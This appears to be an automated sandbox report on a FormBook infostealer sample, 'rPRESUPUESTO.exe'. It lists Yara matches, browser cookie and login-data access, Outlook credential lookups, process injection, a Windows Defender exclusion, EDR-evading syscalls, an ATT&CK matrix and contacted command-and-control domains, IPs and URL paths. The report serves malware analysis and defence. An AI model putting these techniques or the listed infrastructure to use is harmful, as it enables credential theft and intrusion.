            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 BlobJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Modify Registry            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		111
            Disable or Modify Tools            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook41
            Virtualization/Sandbox Evasion            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script412
            Process Injection            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Abuse Elevation Control Mechanism            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
            Obfuscated Files or Information            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Software Packing            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Timestomp            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            DLL Side-Loading            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465409 Sample: rPRESUPUESTO.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 37 www.quantumvoil.xyz 2->37 39 www.xsemckm.sbs 2->39 41 15 other IPs or domains 2->41 49 Snort IDS alert for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 57 7 other signatures 2->57 10 rPRESUPUESTO.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\Users\user\...\rPRESUPUESTO.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 rPRESUPUESTO.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 MqDMLUHvZmSMqiwTfIsHo.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 ktmutil.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 MqDMLUHvZmSMqiwTfIsHo.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 www.quantumvoil.xyz 203.161.62.199, 49743, 49744, 49745 VNPT-AS-VNVNPTCorpVN Malaysia 29->43 45 www.rlplatro.sbs 109.123.121.243, 49727, 49728, 49729 UK2NET-ASGB United Kingdom 29->45 47 12 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rPRESUPUESTO.exe68%ReversingLabsWin32.Trojan.Leonem
            rPRESUPUESTO.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.active24.com/webforward-mailforward0%Avira URL Cloudsafe
            https://faq.active24.com/cz/806087-Z%c3%a1kladn%c3%ad-informace0%Avira URL Cloudsafe
            https://webftp.active24.com/0%Avira URL Cloudsafe
            http://www.rlplatro.sbs/hpa2/0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-57x57.png0%Avira URL Cloudsafe
            https://faq.active24.com/cz/162807-DNS-hosting?l=cs0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-favicon-32x32.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-favicon-16x16.png0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://mssql.active24.com/0%Avira URL Cloudsafe
            https://www.active24.com/domeny#m-certifikace0%Avira URL Cloudsafe
            https://gui.active24.cz/img/default-domain/free.png0%Avira URL Cloudsafe
            http://www.transelva.com/edi4/0%Avira URL Cloudsafe
            https://www.active24.com/domeny0%Avira URL Cloudsafe
            https://active24.com/cssc/a21/main.less?v=7d8e320747f67055c1a1008fbc40d0c10%Avira URL Cloudsafe
            http://www.xsemckm.sbs/pyns/0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-152x152.png0%Avira URL Cloudsafe
            http://www.quantumvoil.xyz/gb2c/0%Avira URL Cloudsafe
            http://www.coinmao.com/irbt/0%Avira URL Cloudsafe
            http://www.203av.com/dy54/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.genesiestudios.online/s29p/100%Avira URL Cloudmalware
            https://www.active24.com/o-spolecnosti/obchodni-podminky0%Avira URL Cloudsafe
            https://customer.active24.com/0%Avira URL Cloudsafe
            https://gui.active24.cz/library/theme/hp16/style.css0%Avira URL Cloudsafe
            http://gq64q4.cn/user/design/clas/euse/sksueqquqf/810%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-180x180.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-114x114.png0%Avira URL Cloudsafe
            https://active24.cz/objednavka/domain/availability/list0%Avira URL Cloudsafe
            https://gui.active24.cz/font/active24-icons.eot0%Avira URL Cloudsafe
            https://faq.active24.com/cz/045021-Webov%c3%a9-str%c3%a1nky-a-E-shopy0%Avira URL Cloudsafe
            https://www.active24.com/o-spolecnosti/media0%Avira URL Cloudsafe
            https://faq.active24.com/cz/085122-Hosting-a-Servery0%Avira URL Cloudsafe
            https://gui.active24.cz/font/active24-icons.woff0%Avira URL Cloudsafe
            https://www.active24.com/o-spolecnosti/kontakty0%Avira URL Cloudsafe
            https://www.active24.com/weby/mojestranky0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-favicon-96x96.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-76x76.png0%Avira URL Cloudsafe
            https://www.active24.com/jak-na-tvorbu-webu0%Avira URL Cloudsafe
            https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp330%Avira URL Cloudsafe
            http://www.genesiestudios.online100%Avira URL Cloudmalware
            https://www.active24.com/o-spolecnosti/rikaji-o-nas-zakaznici0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-60x60.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/default-domain/dnssec.png0%Avira URL Cloudsafe
            https://www.active24.com/o-spolecnosti/kariera0%Avira URL Cloudsafe
            http://www.gsdaluan.shop/8urb/100%Avira URL Cloudmalware
            https://gui.active24.cz/img/icon/a24-apple-favicon-120x120.png0%Avira URL Cloudsafe
            https://faq.active24.com/cz/808905-E-mailov%c3%a1-%c5%99e%c5%a1en%c3%ad0%Avira URL Cloudsafe
            https://gui.active24.cz/font/active24-icons.svg0%Avira URL Cloudsafe
            https://www.active24.com/o-spolecnosti0%Avira URL Cloudsafe
            https://gui.active24.cz/img/webmail_ikony_vlajky.png)0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-ms-icon-144x144.png0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://faq.active24.com/cz/939671-Fakturace-a-platby0%Avira URL Cloudsafe
            https://www.active24.com/dnssec0%Avira URL Cloudsafe
            http://www.hydrogenmovie.com/vi6c/0%Avira URL Cloudsafe
            https://faq.active24.com/cz/932337-Spolupr%c3%a1ce0%Avira URL Cloudsafe
            https://gui.active24.cz/font/active24-icons.ttf0%Avira URL Cloudsafe
            https://www.active24.com/klientska-zona/zakaznicka-podpora0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://faq.active24.com/cz/757409-Bezpe%c4%8dnost0%Avira URL Cloudsafe
            http://www.atmpla.net/n983/0%Avira URL Cloudsafe
            https://gui.active24.cz/img/default-domain/dns.png0%Avira URL Cloudsafe
            https://blog.active24.cz//0%Avira URL Cloudsafe
            https://faq.active24.com/cz/920729-Dom%c3%a9ny-a-DNS0%Avira URL Cloudsafe
            https://www.active24.com/objednavka/login0%Avira URL Cloudsafe
            https://gui.active24.cz/img/default-domain/superpage.png0%Avira URL Cloudsafe
            https://webmail.active24.com/0%Avira URL Cloudsafe
            http://ww7.europedriveguide.com/2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh0%Avira URL Cloudsafe
            https://mysql.active24.com/0%Avira URL Cloudsafe
            https://gui.active24.cz/img/default-domain/image.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-144x144.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/default-domain/notify.png0%Avira URL Cloudsafe
            https://gui.active24.cz/css/landing.css0%Avira URL Cloudsafe
            https://gui.active24.cz/img/default-domain/redirect.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-favicon-192x192.png0%Avira URL Cloudsafe
            https://gui.active24.cz/img/icon/a24-apple-favicon-72x72.png0%Avira URL Cloudsafe
            https://www.active24.com0%Avira URL Cloudsafe
            https://www.superstranka.cz/0%Avira URL Cloudsafe
            https://www.active24.com/spoluprace0%Avira URL Cloudsafe
            http://www.europedriveguide.com/2pcd/0%Avira URL Cloudsafe
            http://www.mommysdaycare.net/k4dg/0%Avira URL Cloudsafe
            https://www.active24.com/upozorneni0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            225.jtrhc.fun
            		192.207.62.21
            		truetrue
              		unknown
              www.mommysdaycare.net
              		199.59.243.226
              		truetrue
                		unknown
                www.coinmao.com
                		192.227.175.142
                		truetrue
                  		unknown
                  www.quantumvoil.xyz
                  		203.161.62.199
                  		truetrue
                    		unknown
                    genesiestudios.online
                    		31.186.11.254
                    		truetrue
                      		unknown
                      www.atmpla.net
                      		103.224.182.246
                      		truetrue
                        		unknown
                        2xin3.zhanghonghong.com
                        		122.10.13.122
                        		truetrue
                          		unknown
                          www.203av.com
                          		45.207.12.95
                          		truetrue
                            		unknown
                            www.b6fbly7u.shop
                            		121.254.178.238
                            		truetrue
                              		unknown
                              www.europedriveguide.com
                              		72.52.179.174
                              		truetrue
                                		unknown
                                www.xsemckm.sbs
                                		47.242.109.15
                                		truetrue
                                  		unknown
                                  www.rlplatro.sbs
                                  		109.123.121.243
                                  		truetrue
                                    		unknown
                                    www.transelva.com
                                    		74.208.236.72
                                    		truetrue
                                      		unknown
                                      www.hydrogenmovie.com
                                      		81.95.96.29
                                      		truetrue
                                        		unknown
                                        www.tcqlk.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.genesiestudios.online
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.gsdaluan.shop
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.rlplatro.sbs/hpa2/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.transelva.com/edi4/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.coinmao.com/irbt/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.xsemckm.sbs/pyns/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.quantumvoil.xyz/gb2c/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.genesiestudios.online/s29p/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.203av.com/dy54/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gsdaluan.shop/8urb/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.hydrogenmovie.com/vi6c/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.atmpla.net/n983/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.europedriveguide.com/2pcd/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mommysdaycare.net/k4dg/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://faq.active24.com/cz/162807-DNS-hosting?l=csktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-favicon-16x16.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://webftp.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
